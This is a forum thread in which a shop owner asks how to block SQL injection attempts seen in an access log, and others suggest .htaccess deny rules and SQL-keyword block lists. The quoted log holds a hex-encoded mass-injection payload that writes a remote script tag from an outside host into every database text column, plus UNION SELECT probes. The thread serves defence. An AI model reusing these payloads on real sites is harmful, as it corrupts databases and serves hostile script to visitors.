Page 1 of 2 12 LastLast
Results 1 to 10 of 13

Thread: Attack defense

  1. #1
    Junior Member
    Join Date
    Nov 2007
    Location
    USA
    Posts
    7

    Default Attack defense

    Hello,

    I have some suspicious activities on my web site. This is trying to attack my site with an SQL injection technique. Here is what I have in my access_log:
    Code:
    76.108.90.33 - - [16/Oct/2008:02:50:53 -0600] "GET /product_info.php?pName=product';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172
    283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F5220736
    56C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973
    636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752
    720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970
    653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204
    645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320
    5748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617
    465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F74
    69746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F637
    37273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E
    6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2
    F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27
    2727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542
    C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4341544520546162
    6C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 8973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705)"
    One possible defense is to write a .htaccess rule that fails the request if the GET parameters include a "@" character. The rule that I use is:
    Code:
    RewriteCond %{QUERY_STRING} @ [NC]
    RewriteRule ^ - [F]
    The rule seems to be working fine. However, I just found that this rewrite rule creates a problem with a normal occurence of @ at my site. I have a survey page, the URL looks like this: http://store.com/survey.php?&email=v...&order_num=622. When I enter the link to survey page, I get:
    Forbidden
    You don't have permission to access /survey.php on this server.
    Since an e-mail address does have an @ symbol, that rewrite rule matches and sends a Forbidden page.

    Is there any other way I can prevent attack attempts or rewrite the rule, so it won't interfere with my other pages with the normal @ occurences?

    Thanks.

  2. #2
    Moderator wildjokerdesign's Avatar
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,720

    Default

    The better solution would be to have this filtered by the php page that is being accessed. I would imagine that it already is if you found it on the web some place and the developers keep the security of the program up to date.

    The other solution is to block the IP# 76.108.90.33 if it happens to be consistent. You can do the via your Site Manager.

    It seems strange that you would want to send the email address via a GET/QUERY_STRING in the survey.php file. Would it not be better to send it via POST?

    You might also try:
    Code:
    RewriteCond %{QUERY_STRING} ExEC(@S) [NC]
    RewriteRule ^ - [F]
    OR:
    Code:
    RewriteCond %{QUERY_STRING} DeCLARE%20@S [NC]
    RewriteRule ^ - [F]
    Shawn
    Please remember your charity of choice: http://www.redcross.org

    Handy Links: wildjokerdesign.net | Plain Text Editors: EditPlus | Crimson

  3. #3
    Junior Member
    Join Date
    Nov 2007
    Location
    USA
    Posts
    7

    Default

    No, blocking IP is not a solution because it keeps changing every time as well as the automatic requests the scripts send. One time it's DECLARE in the request, next time it might be something else, it's not consistent.
    Code:
    203.142.16.45 - - [05/Nov/2008:09:50:37 -0700] "GET /index.php?sort=-999+AND+1=1+UNION+ALL+SELECT+user(),database(),@@version-- HTTP/1.0" 200 46841 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
    203.142.16.45 - - [05/Nov/2008:09:50:37 -0700] "GET /index.php?sort=-1+AND+1=1+UNION+ALL+SELECT+user(),database(),@@version-- HTTP/1.0" 200 46756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
    The survey.php is a part of the osc contribution that I added. I didn't make the code, so I use it as is, and it's working fine.

    The Rewrite rules that you mentioned above, what do they mean? Will they match only if there will be either DECLARE or ExEC in requests?

    Thanks.

  4. #4
    Moderator wildjokerdesign's Avatar
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,720

    Default

    Irin,
    Yes the examples I posted would match to Declare or exec. Actually they would match to ExEC(@S) or DeCLARE%20@S and the match would not be case sensitive.

    I did some searching on Google and found this suggestion on the Webmaster Fourms:
    Code:
    RewriteCond %{QUERY_STRING} [^a-z](declare|char|set|cast|convert|delete|drop|exec|insert|meta|script|select|truncate|update)[^a-z] [NC]
    RewriteRule (.*) - [F]
    That is a combination of all database commands that you would not want people to pass in a query. That should do what you want. You might want to browse the linked thread over at Webmaster World for other tips on using this condition.
    Shawn
    Please remember your charity of choice: http://www.redcross.org

    Handy Links: wildjokerdesign.net | Plain Text Editors: EditPlus | Crimson

  5. #5
    Junior Member
    Join Date
    Nov 2007
    Location
    USA
    Posts
    7

    Default

    If I use this rule as it is written, I can't work with the database. The functions such as update, delete, drop, insert, may be the others too send me to a Forbidden page. So, it's may be preventing people from accessing the database, but I can't access it either.

  6. #6
    Moderator wildjokerdesign's Avatar
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,720

    Default

    Why would you be sending those commands in a query string? I am not aware of any programs that work with the database via the web that would do that.
    Shawn
    Please remember your charity of choice: http://www.redcross.org

    Handy Links: wildjokerdesign.net | Plain Text Editors: EditPlus | Crimson

  7. #7
    Junior Member
    Join Date
    Nov 2007
    Location
    USA
    Posts
    7

    Default

    The osCommerce has store admin that allows to view/edit customers, products, orders, etc. Functions such as update, delete, drop, insert, etc. send me to a Forbidden page with the new RewriteRule.

    Unfortunately, I'm not familiar wih the scripts that hackers use to attack the web sites. I'm just seeing hits from different IPs with query strings in requests.

  8. #8
    Moderator wildjokerdesign's Avatar
    Join Date
    Jun 2003
    Location
    Kansas City Mo
    Posts
    5,720

    Default

    You could remove those from the RewriteCond if you wanted to. I don't really think you need to worry about blocking these request. OsCommerce should be doing that for you when needed.
    Shawn
    Please remember your charity of choice: http://www.redcross.org

    Handy Links: wildjokerdesign.net | Plain Text Editors: EditPlus | Crimson

  9. #9
    Junior Member
    Join Date
    Nov 2007
    Location
    USA
    Posts
    7

    Default

    I don't know if osCommerce blocks these attempts or not and have no way to check it. I just hope that it does. However, I still see from time to time that different scripts are trying to access my database. I don't know if it's something that I need to worry about or not.

  10. #10
    Junior Member
    Join Date
    Nov 2008
    Posts
    2

    Default

    If product_info.php is your page, you can (and should) truncate the product name at the apostrophe before taking any action on the user input.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •